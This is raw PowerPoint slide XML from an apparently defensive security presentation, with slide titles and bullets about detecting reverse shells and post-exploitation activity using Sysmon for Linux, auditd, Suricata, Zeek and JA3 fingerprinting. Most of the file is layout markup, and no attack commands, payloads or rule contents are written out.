                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Sysmon for Linux rules focused on reverse-shell setup via netcat and bash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Anonymous Pro"/>
                <a:ea typeface="Anonymous Pro"/>
                <a:cs typeface="Anonymous Pro"/>
                <a:sym typeface="Anonymous Pro"/>
              </a:rPr>
              <a:t>Use suricata for Spotting reverse-shell commands moving in cleartext </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="3359"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B75E7B7-FF32-B0B3-4F01-4EBC1EB589B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F4F37F3-AAE6-A6F1-2DAC-ABAE239AF4D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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13/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B66B291A-5E42-C61D-8C96-899498EAE1DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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16" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C5EA147-B909-7489-6AD5-085AB6020D61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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8B846213-97BC-161B-2B74-51CA7DDB790B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2209800" y="5143500"/>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1" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EDF9CBFA-78A1-E7F2-FDBC-70BE66E09C91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10705775" y="8736397"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="AutoShape 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8369623C-343C-1C94-0686-6388028354BB}"/>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3" name="AutoShape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBB44B96-BB7F-7CB6-9A5B-1854DDA1249E}"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="352065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a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{611C7F54-E4EE-33C5-75D0-699FDAFFF737}"/>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A369E8DA-A5FF-B4AE-2C28-0AA70EA9A2B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10775967" y="1759241"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F6403DD-2DDD-A97B-E1DE-D0F4106165BB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{09C15EC6-B6F4-A633-4449-50F84122C6DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10911840" y="1557535"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC029EB-4D2C-D09B-7F4E-5FFD5042D5D7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="-11942" r="-11942"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07BB025C-B62E-C0FE-6A6C-7E247DD1CE7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2324100"/>
            <a:ext cx="2629652" cy="740587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Shell  Type</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F42FBC5-0C83-3DB3-B72D-C1F68AA87067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{438305AE-E353-0027-3E20-4A72B5D397EA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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13/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96FE8D79-B66C-0F74-1CB8-EB4779522929}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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16" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4FA72F3-DA5B-3E29-AE6D-1CCF7E9C6DA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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4F2BF06B-C89F-D5AC-6D72-BE9B133D9CA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2209800" y="5143500"/>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8" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1088DB9E-A955-65B8-52C0-DE585673B60B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="470402"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EA92A51-5697-7B5A-1A17-2AA7FF8A72D5}"/>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0" name="AutoShape 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A2F08C3-C423-8A2E-C0D1-0F0752FC38DC}"/>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21" name="Group 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F342B4C-30A2-1C3F-6FEC-F9622FF6741E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10705775" y="8736397"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="AutoShape 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03135558-B3A2-E685-D44E-A9E7125D1A5F}"/>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3" name="AutoShape 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4160BD58-D205-A6B7-4D2C-CEC6B478A708}"/>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
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A8EB49-024D-7A73-C878-DB04D9341E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4419600" y="2277007"/>
            <a:ext cx="5867400" cy="732893"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Typical Strings/Banners</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="Picture 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D856EF75-F6E5-EDB9-472E-E2A059AD8B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="3320949"/>
            <a:ext cx="10653304" cy="5175351"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66389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a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6ED6A1B3-2477-8AD2-7EBE-FD9E62FD7C57}"/>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8C30B112-ECA9-98CC-A324-75B9E5DC5E5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10775967" y="1759241"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freeform 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E87F117-8DF8-D6EC-B4F6-206CD7CA6749}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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solidFill>
              <a:srgbClr val="C51AF6"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A155DF96-8806-E6CB-A2D3-C22F8825E098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10911840" y="1557535"/>
            <a:ext cx="6995160" cy="6499414"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="812800" cy="755197"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Freeform 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{901A9D9C-51C1-807E-DC8B-E50D821C3B86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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blipFill>
              <a:blip r:embed="rId3"/>
              <a:stretch>
                <a:fillRect l="-11942" r="-11942"/>
              </a:stretch>
            </a:blipFill>
            <a:ln w="38100" cap="sq">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD641CB0-3C13-0589-ACA5-8A5DADFC3414}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1561347" y="257335"/>
            <a:ext cx="9778923" cy="771365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="6874"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" u="none" strike="noStrike" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Horizon"/>
                <a:ea typeface="Horizon"/>
                <a:cs typeface="Horizon"/>
                <a:sym typeface="Horizon"/>
              </a:rPr>
              <a:t>Post Exploit detection with JA3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48D038EF-8027-704B-0D96-3AD925E009BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="3597176"/>
            <a:ext cx="8679875" cy="3170099"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> Let a network sensor (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Suricata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> or Zeek) compute JA3/JA3S from TLS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F0F6FC"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> Use auditd and sysmon to capture the host context (who/what connected).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" u="none" strike="noStrike" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Anonymous Pro"/>
              <a:ea typeface="Anonymous Pro"/>
              <a:cs typeface="Anonymous Pro"/>
              <a:sym typeface="Anonymous Pro"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DA86459-9CBB-91C5-9209-54B156987B09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15320984" y="0"/>
            <a:ext cx="1938320" cy="757629"/>
            <a:chOff x="19132242" y="0"/>
            <a:chExt cx="2584426" cy="1010172"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="TextBox 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20979FED-F7EA-1040-5B17-C278FCA007E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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13/20</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="AutoShape 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA79D8F1-7493-051E-D029-95DE1EE23B4C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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16" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9789EDDF-2080-AEAF-5554-50516CA23D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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6714B759-287D-CF39-4290-B0E70B456522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2209800" y="5143500"/>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8" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9DA4CA7-46A6-A3AB-DE4D-61EE2D096B5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="609600" y="470402"/>
            <a:ext cx="634498" cy="634498"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="845997" cy="845997"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
